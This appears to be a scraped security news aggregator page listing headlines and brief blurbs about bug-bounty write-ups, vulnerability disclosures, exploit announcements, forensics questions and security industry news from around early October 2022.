    TryHackMe WriteUp: Corridor
    No content preview
    TryHackMe: 0x41haz Room Write-Up [No Answer]
    No content preview
    Orange Arbitrary Command Execution
    No content preview
  • Open

    Impacket Impediments
    Good morning, Happy October! Here’s an extra-long 13Cubed episode for you, as well as an accompanying Impacket Exec Commands Cheat Sheet (see below). In this episode, we'll take a look at the five (5) Impacket exec commands: atexec.py, dcomexec.py, psexec.py, smbexec.py, and wmiexec.py. The goal is to understand what event log residue we should be looking for on the target system, both with standard "out-of-the-box" log configuration, and with additional configurations such as process auditing with command line. Episode: https://www.youtube.com/watch?v=UMogme3rDRA Impacket Exec Commands Cheat Sheet: https://www.13cubed.com/downloads/impacket_exec_commands_cheat_sheet.pdf Episode Guide: https://www.13cubed.com/episodes/ 13Cubed YouTube Channel: https://www.youtube.com/13cubed 13Cubed Patreon (Help support the channel and get early access to content and other perks!): https://www.patreon.com/13cubed submitted by /u/13Cubed [link] [comments]
  • Open

    Released PS5 Kernel exploit and WebKit vulnerability for Firmware 4.03
    Article URL: https://wololo.net/2022/10/03/released-ps5-kernel-exploit-webkit-vulnerability-for-firmware-4-03/ Comments URL: https://news.ycombinator.com/item?id=33065419 Points: 2 # Comments: 0

  • Open

    PS5-4.03-Kernel-Exploit: An experimental webkit-based kernel exploit (Arbitrary R/W) for the PS5 on 4.03FW
    submitted by /u/sanitybit [link] [comments]
    BSides San Francisco 2022 Conference Recordings
    submitted by /u/sanitybit [link] [comments]
    spk aka spritzgebaeck: A small OSINT/Recon tool to find CIDRs that belong to a specific organization.
    submitted by /u/BananaBounty [link] [comments]
    Passkeys feat. Adam Langley [audio]
    submitted by /u/self [link] [comments]
    Dank: The greatest encoder you've never heard of
    submitted by /u/Quick-Ingenuity-7024 [link] [comments]
    GitHub - jafarlihi/rconn: rconn is a multiplatform program for creating generic reverse connections. Lets you consume services that are behind firewall or NAT without opening ports or port-forwarding.
    submitted by /u/jafarlihi [link] [comments]
    Censys CTF - WriteUp
    submitted by /u/TechbrunchFR [link] [comments]
    An updated list of PoC's CVE's
    submitted by /u/DevOpsMuffin39 [link] [comments]
    Phishing With Chromium's Application Mode
    submitted by /u/CyberMasterV [link] [comments]
    What I learnt from reading 126 Information Disclosure bug reports/writeups.
    submitted by /u/_nynan [link] [comments]
  • Open

    Safety of unknown external drive
    Hello, I apologize if this is not the correct subreddit. I recently found a Western Digital 1TB external drive for $4 at a second-hand store. It appeared to be NIB. It wasn't in plastic wrap, but it did have a sticker taping it shut. I popped it open and confirmed the drive looks OEM (i.e., there's no obvious USB RubberDucky in place of the hard drive). I hooked it up to a newly flashed air-gapped Raspberry Pi, deleted the partition, created a new partition, and formatted it. Am I being overly paranoid? Is it reasonable to assume the drive is safe to use? Thank you! submitted by /u/fkitnewy [link] [comments]
  • Open

    Bug Bounty: Hunting Open Redirect Vulnerabilities For $$$
    Image Source: BePractical Continue reading on Medium »
    Gcash Vulnerability Walkthrough
    Advisory: Update your Gcash Application now to the latest version. Continue reading on Medium »
    IDOR in GraphQL Query Leaking Private Photos of a Million $ App
    Introduction To GraphQL Continue reading on Medium »
    Breaking Business Logic - Part: 2^7 = 1
    Hello Hunters & Ninjas, In very short span of time this article has been published because I’m very consistent person in writing blogs as… Continue reading on Medium »
  • Open

    SecWiki News 2022-10-02 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-10-02 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Lazarus 滥用戴尔驱动程序漏洞部署 FudModule Rootkit
    研究人员发现,臭名昭著的朝鲜黑客组织 Lazarus 部署了新的 Windows Rootkit,该恶意软件利用了戴尔驱动程序的漏洞。
  • Open

    SPY NEWS: 2022 — Week 39
    Summary of the espionage-related news stories for the Week 39 (25 September-1 October) of 2022. Continue reading on Medium »
  • Open

    X
    This year I saw the trailer for X and Stephen King tweeting about how much he loved this A24 film, so I knew there was little chance of me… Continue reading on Medium »

  • Open

    How I found an IDOR Worth $1500
    Hello, today I am talking about the bug I recently found in one of biggest companies in the world. Continue reading on Medium »
    Programa de referencia de Hats: Recompensa de $ 1000 USDC para los contribuyentes que refieran a…
    El Protocolo Hats ofrece diferentes herramientas que alinean incentivos entre hackers y protocolos para aumentar la seguridad en Web3. La… Continue reading on Medium »
    Tale of Easy P1 Bugs in Wild
    So after long time, i got back on bugcrowd where i had private program so i looked at scope it was wildcard (*.redicated.com) scope.I… Continue reading on Medium »
    Cloud Enumeration Series: Discovering Azure Websites using ffuf
    As part of my Azure Cloud Enumeration process, I like to make use of the web fuzzing tool ffuf to fuzz azurewebsites.net for subdomains… Continue reading on Medium »
    G-map API KEY Exploitation
    Hey folks,today I am sharing about gmap api key exploitation. Continue reading on Medium »
    Open Redirect in Ind**mart
    Hey folks, today I came with an open redirect vulnerability bug. Continue reading on Medium »
  • Open

    Attending conferences and talks solo?
    Hello! Mid-level here, cloud security, recently switched companies. My new role is fully remote and the company is in a different country. The work itself, salary, and learning opportunities are good, but I really started to miss face to face interaction with like-minded individuals and would like to boost my network a bit if I wanted to switch roles again. Thought about attending conferences and tech meetups in my area (I'm EU-based) and maybe a big one abroad if I really enjoy it, like Defcon. The problem is, except for one vendor event for partners in my previous company I've never been to such events (and this one was basically a giant sales pitch where everyone was waiting for it to finish and down all the free booze. The colleagues from my previous company have warned me all the conferences are this way. Is it true btw?) I'm afraid I will feel super weird and stick out like a sore thumb or just listen to the talks and not talk to anybody. How do you successfully network / get to know the people at those types of events? Especially the big ones? Just approaching someone after a talk and saying it was great seems weird to me, he must have gotten 100s of those. How about all the other people? Should I somehow connect with people way before the conferences (idk, linkedin?) and then just offer them to meetup at those? What's the best strategy? Do people who work remotely even go to those types of events or were my coworkers from my previous company right and people just use it as a company-sponsored party with some talks thrown in and no one goes there on their own? Thank you for all the insights! submitted by /u/nanji909 [link] [comments]
    Automatic tools for find sqli
    Sqlmqp is a super tool for exploration. However, we need to give it an injection point. What do you recommend the best tools to automatically find injection points? What I know is Netsparker, Acunetix, Burp scanner. Maybe you can recommend something else? submitted by /u/mobo2015 [link] [comments]
    Compliance professional leading IT Audit, Security reviews 10+ years, thinking of transitioning to Data Privacy field. What’s your take on this partner industry?
    NT but happy to help address questions about what I do, specifically. Personally I think data privacy/data protection field is a growing one and VERY important. I also don’t have a Law background but my feeling is that people from IT Security, IT Audit, Compliance, etc. industries will do well in Privacy field and there space for us. submitted by /u/nichijouuuu [link] [comments]
    Would security be easier if there were 2^32 ports instead of 2^16?
    Special port usage is countered by scanning, but if scanning wasn't so arbitrarily limited, would it be easier to secure transmission via obscurity? submitted by /u/oldschool_anime [link] [comments]
    Smart bulb / Gosund
    I recently installed a smart bulb that needed to connect to wifi and the app they had me use (Gosund) asked me for my wifi pass. I submitted it but got spooked later and uninstalled the app and changed my wifi pass. Is my network still compromised? submitted by /u/fyenfi [link] [comments]
  • Open

    Report on Secure Compilation
    submitted by /u/0x414141 [link] [comments]
    Tillitis - Open Source USB security key inspired by measured boot and DICE
    submitted by /u/0x414141 [link] [comments]
    Analyzing BSD Kernels for Uninitialized Memory Disclosures using Binary Ninja
    submitted by /u/0x414141 [link] [comments]
    HTTPT: A Probe-Resistant Proxy
    submitted by /u/0x414141 [link] [comments]
    pizauth, an OAuth2 token requester daemon
    submitted by /u/0x414141 [link] [comments]
    Wiresocks for easy proxied routing
    submitted by /u/sanitybit [link] [comments]
    Emulate Shellcode with Radare2
    submitted by /u/sanitybit [link] [comments]
    /r/netsec's Q4 2022 Information Security Hiring Thread
    Overview If you have open positions at your company for information security professionals and would like to hire from the /r/netsec user base, please leave a comment detailing any open job listings at your company. We would also like to encourage you to post internship positions as well. Many of our readers are currently in school or are just finishing their education. Please reserve top level comments for those posting open positions. Rules & Guidelines One post per company; it may contain multiple open positions. Please do not use multiple comments to post multiple positions, as the additional comments will be removed. Include the company name in the post. If you want to be topsykret, go recruit elsewhere. Include the geographic location of the position along with the availability of relocation assistance or remote work. If you are a third party recruiter, you must disclose this in your posting. Please be thorough and upfront with the position details. Use of non-hr'd (realistic) requirements is encouraged. While it's fine to link to the position on your companies website, provide the important details in the comment. Mention if applicants should apply officially through HR, or directly through you. Please clearly list citizenship, visa, and security clearance requirements. You can see an example of acceptable posts by perusing past hiring threads. Feedback Feedback and suggestions are welcome, but please don't hijack this thread (use moderator mail instead.) submitted by /u/sanitybit [link] [comments]
  • Open

    Is there a Google parameter to stipulate only up addresses, no domains?
    Yikes sorry I meant IP not UP. Lol autocorrect. submitted by /u/AndrewZabar [link] [comments]
  • Open

    SecWiki News 2022-10-01 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-10-01 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Cloud Enumeration Series: Discovering Azure Websites using ffuf
    As part of my Azure Cloud Enumeration process, I like to make use of the web fuzzing tool ffuf to fuzz azurewebsites.net for subdomains… Continue reading on Medium »
    Cyber Security-Red Team Operations Chapter-1 (Wifi Hacking)
    Read this article in Turkish Continue reading on Medium »
  • Open

    Cloud Enumeration Series: Discovering Azure Websites using ffuf
    As part of my Azure Cloud Enumeration process, I like to make use of the web fuzzing tool ffuf to fuzz azurewebsites.net for subdomains… Continue reading on Medium »
    How Kalibr missiles could determine the outcome of the Ukraine war
    Putin’s favourite cruise missiles have an uncertain future. It could save the lives of many civilians Continue reading on Medium »
    Warum Kalibr Raketen den Ukrainekrieg entscheiden könnten
    Putins bevorzugte Cruise-Missiles haben eine unsichere Zukunft. Das könnte das Leben vieler Zivilisten retten Continue reading on Medium »
    Collection Useful Link for OSINT and Threat Hunting
    These resources will continually be updated and collected from various sources (The latest update was 1/10/2022). Continue reading on Medium »
  • Open

    TryHackMe: Corridor Room Write-Up [No Answer]
    No content preview
    Security vs Compliance-Cloudflare Password Policy Restriction Bypass
    No content preview
    CVE-2022–35405: Critical ManageEngine RCE
    No content preview
  • Open

    TryHackMe: Corridor Room Write-Up [No Answer]
    No content preview
    Security vs Compliance-Cloudflare Password Policy Restriction Bypass
    No content preview
    CVE-2022–35405: Critical ManageEngine RCE
    No content preview
  • Open

    TryHackMe: Corridor Room Write-Up [No Answer]
    No content preview
    Security vs Compliance-Cloudflare Password Policy Restriction Bypass
    No content preview
    CVE-2022–35405: Critical ManageEngine RCE
    No content preview
  • Open

    再探WebSocket内存马(内存马系列篇八)
    接下来我们需要学习建立在其上的一种内存马, tomcat-websocket内存马的实现。
  • Open

    College Degree with LE and certs
    Hey y’all, I appreciate you taking the time to read this. I’m currently a law enforcement officer and digital forensic examiner in south Florida. I attended college, and obtained a lot of credits but never finished a degree program. I am now looking to get a degree in Cybersecurity and or Digital Forensics. Does anyone know of any universities that offer self paced online courses and that will offer a large amount of credits for law enforcement/digital forensic certifications? I know of WGU and Champlain. I am open to obtaining an associate’s prior to a bachelor’s program if needed. Have a great weekend! submitted by /u/jaguars0208 [link] [comments]
  • Open

    Generated passwords are not fully validated by HIBPValidator
    Nextcloud disclosed a bug submitted by bjoernv: https://hackerone.com/reports/1606961 - Bounty: $100
  • Open

    Nord Stream Attacks Expose Vulnerability of EU Infrastructure
    Article URL: https://www.spiegel.de/politik/deutschland/nord-stream-anschlag-operation-seebeben-a-2525d727-a892-4781-89b7-34cd5d1ecae3 Comments URL: https://news.ycombinator.com/item?id=33043741 Points: 1 # Comments: 0
  • Open

    Third party agents for Havoc C2
    submitted by /u/CodeXTF2 [link] [comments]

  • Open

    Bienvenido Angle Protocol!
    ¡Estamos muy emocionados de dar la bienvenida a Angle Protocol al ecosistema de Hats! Esperamos poder ayudarlos a agregar una capa de… Continue reading on Medium »
    Distributed Bruteforcing of DNS records
    Using shuffleDNS/pureDNS + BBRF + Axiom Continue reading on Bug Bounty »
    How I Bypassed Signup OTP with developer’s fault!
    Hi everyone, I’m Rawaz. In this first write-up, I’ll show you how I bypassed OTP on a signup page. Continue reading on Medium »
    How I found the “No Rate Limit” on multiple websites
    Hello everyone! I’m Nitish, hope you all are doing great. In this, I will share how I found “No Rate Limit” on many public websites and a… Continue reading on Medium »
    Source code scanner for Finding Critical Vulnerabilities
    Source code analysis is one of the most thorough methods available for auditing software. It is also one of the most expensive, but it… Continue reading on Medium »
    Netscrapper.py, Powerful network auditing tool
    Introduction Continue reading on Medium »
    How I made 200$ in 5 minutes by email injection. First Bug Bounty
    Recently I was hunting on a private program. It had very less functionality and just had its marketing site with admin and an API as its… Continue reading on Medium »
    CLICKJACKING (UI redressing)
    Let us know in detail…. Continue reading on Medium »
    Security vs Compliance-Cloudflare Password Policy Restriction Bypass
    After a small break on bug bounty, I started hunting on the Cloudflare Bug Bounty program. This write-up is about the Password Policy… Continue reading on Medium »
  • Open

    H4CK1NG G00GL3 - Security challenges
    submitted by /u/foxTN [link] [comments]
    VNCERT/CC has just developed a tool to check Exchange's 0-day exploit http request blocking. #exchange #0day #exploit #vncertcc
    submitted by /u/InterestingEmu4225 [link] [comments]
    What I learnt from reading 220 IDOR bug reports.
    submitted by /u/_nynan [link] [comments]
    Detecting Mimikatz with Busylight
    submitted by /u/digicat [link] [comments]
    Arbitrary cache poisoning on all Akamai websites via 'Connection: Content-Length'
    submitted by /u/albinowax [link] [comments]
  • Open

    Bypassing authorization of linked Instagram account
    TikTok disclosed a bug submitted by ckerha: https://hackerone.com/reports/1199965 - Bounty: $170
    Open Redirect on www.redditinc.com via `failed` query param bypass after fixed bug #1257753
    Reddit disclosed a bug submitted by lu3ky-13: https://hackerone.com/reports/1285081 - Bounty: $200
    IDOR allows an attacker to modify the links of any user
    Reddit disclosed a bug submitted by criptex: https://hackerone.com/reports/1661113 - Bounty: $5000
    Unrestricted File Upload on reddit.secure.force.com
    Reddit disclosed a bug submitted by heckintosh: https://hackerone.com/reports/1606957 - Bounty: $100
    Lack of Packet Sanitation in Goflow Results in Multiple DoS Attack Vectors and Bugs
    Cloudflare Public Bug Bounty disclosed a bug submitted by path_network: https://hackerone.com/reports/1636320 - Bounty: $500
    Password Policy Restriction Bypass
    Cloudflare Public Bug Bounty disclosed a bug submitted by lohigowda: https://hackerone.com/reports/1675730 - Bounty: $250
  • Open

    What is an effective way to document and plan a pentest internal company?
    I have been tasked to plan a pentest for our company for web app and infrastructure. We have about 15 projects that needs to be done. Currently, we document, schedule, scope it out and put it in Confluence for the stakeholders to see. I feel like this may not be an optimal way (or maybe not) as there is no way to aggregate data effectively and harder to enforce standardisation as its not a fixed form etc. A better way would be to use a CRM, but this may be an overkill as its only 15 pentest a year which is manageable with our current system. What are other ways to effectively plan and schedule a pentest such that there is an central platform to get the quotes, scopes, reports, etc? In the past we used to have Monday and Float which was used more for scheduling someone one a job or task. We also used Salesforce as the CRM of choice to see the email flow and quotes better. I feel like this may make more sense for consultancy where they have to deal with a number of projects and different client every day. submitted by /u/VertigoRoll [link] [comments]
    [Need advice] Addressing cyber security at a startup
    Hi folks, cyber security is a sea and as a startup it is difficult to decide where to start. What would be your advice for a tech startup for addressing cyber security? At what stage and where do you start? What all should be addressed as you scale? Is there a phased approach to it? submitted by /u/xharpo [link] [comments]
    How to Portscan Local Network with VPS/EC2?
    I wanted to scan my local, private network (10.0.x.x) but my own hardware (tried WSL + VM) had issues that cannot seem to run masscan at all or Nmap at a competent rate. ​ As a result, for my last ditch effort I was considering using a VPS or a free tier EC2 to somehow tunnel into my local network and scan my current local network that my computer is on. Is this the best option or are there better ways to scan just my local network? There will be no outbound traffic to websites. ​ Thank you! submitted by /u/No_Student_3535 [link] [comments]
    Need someone with WireShark knowledge to help me with a few tasks
    Hi, in school we are starting to use a program called wireshark which im sure most of you are familiar with. I’m looking for someone who is knowledgeable in wireshark to help me understand it because my teacher didn’t do a good job. All I need is someone to answer a few questions for me about it. Pm me if you can help submitted by /u/Sxeem [link] [comments]
  • Open

    Training
    I am looking for a red and blue team training any trainer who can train me on technical. Hands-on submitted by /u/mcllisms [link] [comments]
    Microsoft has detected social engineering campaigns targeting employees of orgs across industries in the US, UK, India, Russia. MSTIC attributes the campaigns to North Korea-based actor ZINC, which used multiple weaponized open-source software.
    submitted by /u/SCI_Rusher [link] [comments]
    cvet: Python utility for pulling actionable vulnerabilities from cvetrends.com
    submitted by /u/thricethagr8est [link] [comments]
    PoC CVE's Updated List
    submitted by /u/DevOpsMuffin39 [link] [comments]
  • Open

    Hacking Butler
    In this blog, I am going to walk you through the box “BUTLER”. It’s fairly easy to hack. So, we will be following a simple penetration… Continue reading on Medium »
    The Orbital Diaries: Parte 1.
    Hace unos meses, el investigador de seguridad mrd0x publicó una serie de bypasses y disrupciones que un atacante local podría realizar… Continue reading on Red Squadron »
  • Open

    COMTRADE: Using Trade Data to Uncover Fraud and Smuggling
    Trade information collected by the United Nations was key to uncovering Big Tobacco’s role in oversupplying cigarettes to a West African… Continue reading on OCCRP: Unreported »
    You may be sharing too much information and not even know it
    Today’s threat actors make use of a variety of information to tailor their attacks against organizations and individuals. By collecting… Continue reading on Hunter Strategy »
    quiztime Challenge(#8)
    Hi, I’m Walnut. Today I share the results of my quiz attempt on quiztime tweets. The quiz will be a photo on Twitter. Our goal is to find… Continue reading on Medium »
  • Open

    SecWiki News 2022-09-30 Review
    软件安全实体关系预测简介 by ourren 一种基于深度学习的语句级缺陷预测方法 by ourren 五种不一样的身份验证绕过技术 by 蓝色淡风 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-09-30 Review
    软件安全实体关系预测简介 by ourren 一种基于深度学习的语句级缺陷预测方法 by ourren 五种不一样的身份验证绕过技术 by 蓝色淡风 更多最新文章,请访问SecWiki
  • Open

    LiME vs AVML for linux memory acquisition
    Hi, One problem i have with LiME is that i need to compile the kernel module for the target machine. This becomes a big headache many times specially with custom kernels. I just found out about the AVML, which doesn't even use a kernel module it seems and it is not dependant on the target machine. Now i haven't used it much, but wanted to ask the experts here, is there any drawback in using AVML? Considering that it is not dependant on the target kernel, why isn't everyone using this instead of LIME? ​ Basically what I'm asking here is, what do the Linux forensics experts use to acquire memory Linux dump that is compatible with volatility, and we don't care whether it supports android or not? Lime or AVML or something even better? submitted by /u/Ro0o0otkit [link] [comments]
    How to get plaso to run faster?
    Does anyone know of a way to get plaso/psort to run faster (e.g. is there a way to add additional threads?). I applied a filter (https://github.com/mark-hallman/plaso_filters/blob/master/filter_windows.txt) when creating the dump file and did a time slice of two weeks, but a 60gb dump file is taking 14+ hours. Let me know what you think. Thank you, DBR submitted by /u/DeadBirdRugby [link] [comments]
    PoC CVE's Updated List
    submitted by /u/DevOpsMuffin39 [link] [comments]
  • Open

    【漏洞通报】微软Exchange服务SSRF&RCE漏洞(CVE-2022-4104...
    近日,白帽汇安全研究院监测到微软修复了一个服务器端请求伪造(SSRF)漏洞(CVE-2022-41040)和一个远程代码执行(RCE)漏洞(CVE-2022-41082),CVE-2022-4104...
  • Open

    【漏洞通报】微软Exchange服务SSRF&RCE漏洞(CVE-2022-4104...
    近日,白帽汇安全研究院监测到微软修复了一个服务器端请求伪造(SSRF)漏洞(CVE-2022-41040)和一个远程代码执行(RCE)漏洞(CVE-2022-41082),CVE-2022-4104...
  • Open

    PoC CVE's Updated List
    Article URL: https://github.com/tg12/PoC_CVEs Comments URL: https://news.ycombinator.com/item?id=33033286 Points: 1 # Comments: 0
  • Open

    Broken link를 찾자! DeadFinder
    최근에 Broken Link(Dead Link)를 쉽게 찾기 위한 도구를 하나 만들었습니다. 제 블로그의 Broken Link를 찾기 위한 목적이였지만, 가볍게라도 한번 공유하는게 좋을 것 같아서 블로그 글로 작성해봅니다. DeadFinder 입니다 :D Broken Link Broken Link는 Dead Link 로도 불리며 웹 페이지 내 연결이 불가능한 링크들을 의미합니다. 기본적으로는 a 태그의 href 부터 script src 등 여러 elements에서 호출되는 웹 링크들입니다. Useful Link 이러한 Broken Link 는 SEO(Search Engine Optimization)에 악영향을 미치고, 연결된 도메인 등에 따라서 보안적인 문제를 일으킬 수도 있습니다. 사용자들은 링크를 클릭할 때 주소 뿐만 아니라 해당 페이지의 신뢰성도 고려하게 됩니다. 만약 Broken Link를 누군가 Takover한 경우 서비스의 신뢰도를 이용한 공격에 사용될 수 있습니다. Deadfinder deadfinder는 웹 페이지 내 링크 등을 식별하고 테스트하여 Broken Link를 찾아주는 도구입니다. https://github.com/hahwul/deadfinder https://rubygems.org/gems/deadfinder Installation # Install with Gem gem install deadfinder # Run on Docker docker pull ghcr.io/hahwul/deadfinder:latest Usage Modes 현재까지 크게 4가지의 모드를 지웝합니다. 각 모드의 역할은 아래와 같습니다.   Description Example url 단일 URL을 스캔합니다. deadfinder url https://www.hahwul.com sitemap Sitemap을 분석하여 다수의 URL들을 스캔합니다. deadfinder sitemap https://www.hahwul.com/sitemap.xml file List 형태의 파일을 읽어 다수의 URL들을 스캔합니다. deadfinder file urls.txt pipe STDIN으로 부터 입력받아 다수의 URL들을 스캔합니다. cat...
  • Open

    “要命”的广告弹窗
    本该起保驾护航的汽车中控,却可能因广告弹窗成为潜在的马路杀手。
    FreeBuf周报 | 普京正式授予斯诺登俄罗斯国籍;勒索组织正在将开源软件武器化
    我们总结推荐了本周的热点资讯、安全事件、一周好文和省心工具,保证大家不错过本周的每一个重点!
    反转?美国国家安全局雇员向外国特工泄密,对方实为FBI卧底
    该雇员向一名冒充外国特工的联邦调查局卧底探员,发送被盗的机密信息摘录。
    CyberBattleSim-(内网自动化渗透)研究分析
    CyberBattleSim是一款微软365 Defender团队开源的人工智能攻防对抗模拟工具,来源于微软的一个实验性研究项目。
    为了被重新聘用,被解雇员工竟黑了公司网络
    据悉,这名被解雇员工之所以这么做是为了让前公司以更高的薪水重新雇用他。
    65% 的公司正在考虑采用 VPN 替代方案
    VPN 风险报告表明,网络攻击者继续利用长期存在的安全漏洞,增加了对 VPN 的攻击。
    微软:勒索组织正在将开源软件武器化
    微软称某勒索组织正在对合法的开源软件进行木马化,并将其用于技术、国防和媒体娱乐等许多行业的后门组织。

  • Open

    Infosec Encyclopedia
    Hello Bug Hunters 👋🏼 Continue reading on Medium »
    Orange Arbitrary Command Execution
    Hi everybody Omar Hashem is here, I will share with you how I was able to achieve more than 10 RCE in different companies using the same… Continue reading on Medium »
    How I got a $3000 bounty in 3 min.
    Hi all, Continue reading on Medium »
    Worldwide Server-side Cache Poisoning on All Akamai Edge Nodes ($50K+ Bounty Earned)
    Introduction And Context Continue reading on Medium »
    How to get an Internship In Cybersecurity/Ethical Hacking
    A complete guide to getting an internship for cybersecurity student Continue reading on InfoSec Write-ups »
    Shodan Dorks - The God’s Eye
    Summary : Continue reading on Medium »
    Aurora Improper Input Sanitization Bugfix Review
    Summary Continue reading on Immunefi »
    HTTRACK — MAKE ANY WEBSITE OFFLINE
    Hallo kembali lagi dengan saya, pada tulisan saya kali ini kita akan mencoba melakukan hal yang menarik. di sini saya akan menunjukkan… Continue reading on Medium »
    Friendship with Google : Dorks
    Taking help from our friend Google for recon or information gathering. Continue reading on Medium »
    OAuth 2.0 Hacking
    OAuth is an open authorization protocol, which allows accessing the resources of the resource owner by enabling the client applications on… Continue reading on Medium »
  • Open

    Open Redirect
    Flickr disclosed a bug submitted by stevejubs: https://hackerone.com/reports/1581258 - Bounty: $258
    no rate limit in forgot password session
    Yelp disclosed a bug submitted by irfadps: https://hackerone.com/reports/1714970
    XSS in Widget Review Form Preview in settings
    Judge.me disclosed a bug submitted by penguinshelp: https://hackerone.com/reports/1595905 - Bounty: $500
  • Open

    0-Day RCE Vulnerability Against Microsoft Exchange Servers
    Article URL: https://www.gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html Comments URL: https://news.ycombinator.com/item?id=33027247 Points: 4 # Comments: 0
  • Open

    Found this obfuscated script on my website, anybody can help me deobfuscate it?
    Link: https://hastebin.com/abudolibep.php submitted by /u/xmrchaos [link] [comments]
    Certification Holders Who Can’t Utilize - HITRUST CCSFP/QSA
    I was curious how many people were out there who hold cyber/privacy related certifications but no longer work for an organization who can sponsor them, thus, unable to leverage them any longer in an official capacity / lose them all together. I feel like with the heavy turnover recently there must be a decent population impacted. Maybe I’m wrong but thought this was a good place to ask! submitted by /u/R1skM4tr1x [link] [comments]
    Could Using IE Mode in Edge Violate Acceptable Use?
    This is nowhere near my area of expertise so I wanted to get some more opinions. Within my company's acceptable use policy "Purposely avoiding or deactivating security measures" is listed as prohibited use. We use an external website which was just modified to "work" on edge. It tries to use setRequestHeader for cookie and accept-encoding. In order for it work it must be loaded in IE mode. Since IE mode is, by default, less secure than edge itself, this violates acceptable use as written does it not? submitted by /u/XXXCEDRIN_PM [link] [comments]
  • Open

    New attack campaign utilized a new 0-day RCE vulnerability on Microsoft Exchange Server
    submitted by /u/CyberMasterV [link] [comments]
    GitHub - swanandx/lemmeknow: The fastest way to identify anything! Blazingly Fast alternative to PyWhat made with Rust.
    submitted by /u/swanandx [link] [comments]
  • Open

    Day 97 / 100 & OSCP
    Day 97 was full of some more Windows API in C++. I worked on ”thenet” project and threw together a dropper in C#. What I wanted to do was… Continue reading on Medium »
  • Open

    Chrome 107 Beta
    The Chrome beta post will now be posted to the Chrome Developers site. Find the release notes for Chrome Beta 107 here.
  • Open

    Mounting an AD1 custom content image
    I’m learning about custom content images with FTK Imager. I am able to create one and add it as evidence in FTK Imager. I can view the files there. However , when I try to mount it, it does not mount correctly. It shows up as a drive in This PC, but I cannot browse to any files. Additionally, I tried browsing to it using an administrator powershell console and could not do so. This occurs regardless of if the AD1 image is mounted with FTK Imager or OSFMount. Am I creating the AD1 image incorrectly, or is it just impossible to mount them for some reason? Thanks in advance! submitted by /u/Gizando [link] [comments]
  • Open

    SecWiki News 2022-09-29 Review
    针对VMware云虚拟化平台的定制化攻击专题分析 by ourren 云安全趋势分享(2022年底) by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-09-29 Review
    针对VMware云虚拟化平台的定制化攻击专题分析 by ourren 云安全趋势分享(2022年底) by ourren 更多最新文章,请访问SecWiki
  • Open

    WordPress Vulnerability & Patch Roundup September 2022
    Vulnerability reports and responsible disclosures are essential for website security awareness and education. Automated attacks targeting known software vulnerabilities are one of the leading causes of website compromises. To help educate website owners on emerging threats to their environments, we’ve compiled a list of important security updates and vulnerability patches for the WordPress ecosystem this past month. The vulnerabilities listed below are virtually patched by the Sucuri Firewall and existing clients are protected. Continue reading WordPress Vulnerability & Patch Roundup September 2022 at Sucuri Blog.
  • Open

    Blockchain Network is Secured! But not the apps and their Integrations
    No content preview
    Try Hack Me: Simple CTF Walkthrough
    No content preview
    Understanding the NMAP methodology — Part 3
    No content preview
  • Open

    Blockchain Network is Secured! But not the apps and their Integrations
    No content preview
    Try Hack Me: Simple CTF Walkthrough
    No content preview
    Understanding the NMAP methodology — Part 3
    No content preview
  • Open

    Blockchain Network is Secured! But not the apps and their Integrations
    No content preview
    Try Hack Me: Simple CTF Walkthrough
    No content preview
    Understanding the NMAP methodology — Part 3
    No content preview
  • Open

    assortment of media
    Music, movies, and TV shows. Server is hosted in France, but spot check of the content came back as English. http://90.66.48.191/media/ submitted by /u/dasheswithdots [link] [comments]
    Lots of books in PDF format. Including kids books
    submitted by /u/cdtoad [link] [comments]
  • Open

    Ziion: Discovery of this New Kali Linux for Blockchain Security
    submitted by /u/pat_ventuzelo [link] [comments]
  • Open

    Hardening Backups Against Ransomware
    Human-operated ransomware represents a unique challenge to backup infrastructures. Unlike in other scenarios, ransomware attackers specifically target and attempt to destroy backup systems to increase the likelihood that a victimized organization will pay the ransom. This threat requires a different approach to securing backup infrastructure. The Old Ways Are Not Enough Traditionally, enterprise backup infrastructures... The post Hardening Backups Against Ransomware appeared first on TrustedSec.
  • Open

    甲方渗透测试体系怎么做 | FreeBuf甲方群话题讨论
    甲方企业该如何做渗透,与乙方有何不同?
    一文了解智能汽车网安政策和法规
    完善的法律体系为基础,切实夯筑网络安全的底座,为智能汽车腾飞打下基础。
    FreeBuf早报 | 女子玩“羊了个羊”被骗9万元;中央网信办深入开展网络辟谣标签工作
    近日,常州严女士在玩“羊了个羊”游戏时,为了获取道具观看广告,误入贷款陷阱被骗9万元。
    攻防红队技能篇:社会工程学
    社会工程学简单来说就是攻击者利用人性的弱点,骗取你的信任,从而获取信息的行为。
    国家标准《信息安全技术 网络安全信息报送指南(征求意见稿)》发布
    《报送指南》描述了网络安全信息报送的信息类型、要素、格式规范,以及网络安全信息报送活动的参与角色、基本流程、报送方式。
    《网络安全标准实践指南—健康码防伪技术指南》发布
    《实践指南》给出了现场核验场景下健康码防伪的技术指南,指导健康码服务的技术提供方提高防伪能力,提升整体安全水平。
    Meta 关闭大规模俄罗斯欺诈新闻“网络”
    该网络用于在欧洲各地 60 多个冒充新闻机构的网站上发布虚假信息。
    记一次内网靶场渗透测试
    程序员小星在研究内网渗透,对部分内网靶场进行了测试,所以想和大家从测试过程、检测过程以及域渗透过程这3个方面来分享一下我在打内网靶场中的经历。
  • Open

    OSINT research can leave any of us traumatised
    A day like any other. A new video on my Twitter feed. Then I started having nightmares. Continue reading on Medium »

  • Open

    A breach on Patreon, and their elusive bounty program.
    Introduction. Continue reading on Medium »
  • Open

    Will a jwks always be hosted at /.well-known/jwks.json?
    I'm trying to generate my own JWTs but I'm struggling to find where I need to host the jwks file. I assume it's supposed to be at /.well-known/jwks.json, but it appears that some oidc providers will provide a discovery endpoint at /.well-known/openid-configuration and host the file elsewhere. What's standard practice? Do clients have a pre-defined way of figuring out where the JWKs is given the issuer url? submitted by /u/Pumpkin-Main [link] [comments]
  • Open

    Crypto Bug Bounty Hunting: An Overview Since 2020
    This is article 2 of 4 for the BanklessDAO Writer’s Cohort. Continue reading on Coinmonks »
    WIFI Hacking (My Favorite Write up`s Till date)
